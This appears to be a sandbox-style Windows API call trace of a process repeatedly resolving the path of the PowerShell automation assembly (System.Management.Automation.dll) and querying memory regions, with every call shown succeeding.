	[0162.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.035] GetLastError () returned 0x0
	[0162.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.036] GetLastError () returned 0x0
	[0162.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.036] GetLastError () returned 0x0
	[0162.036] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.037] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.037] GetLastError () returned 0x0
	[0162.037] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.038] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.038] GetLastError () returned 0x0
	[0162.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.038] GetLastError () returned 0x0
	[0162.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.038] GetLastError () returned 0x0
	[0162.038] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.039] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.039] GetLastError () returned 0x0
	[0162.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.040] GetLastError () returned 0x0
	[0162.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.040] GetLastError () returned 0x0
	[0162.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.040] GetLastError () returned 0x0
	[0162.040] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.040] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.041] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdbf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.041] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.042] GetLastError () returned 0x0
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.043] VirtualQuery (in: lpAddress=0xcd6c4, lpBuffer=0xce6c4, dwLength=0x1c | out: lpBuffer=0xce6c4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.043] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.044] GetLastError () returned 0x0
	[0162.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.045] GetLastError () returned 0x0
	[0162.045] VirtualQuery (in: lpAddress=0xcd6c4, lpBuffer=0xce6c4, dwLength=0x1c | out: lpBuffer=0xce6c4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.046] GetLastError () returned 0x0
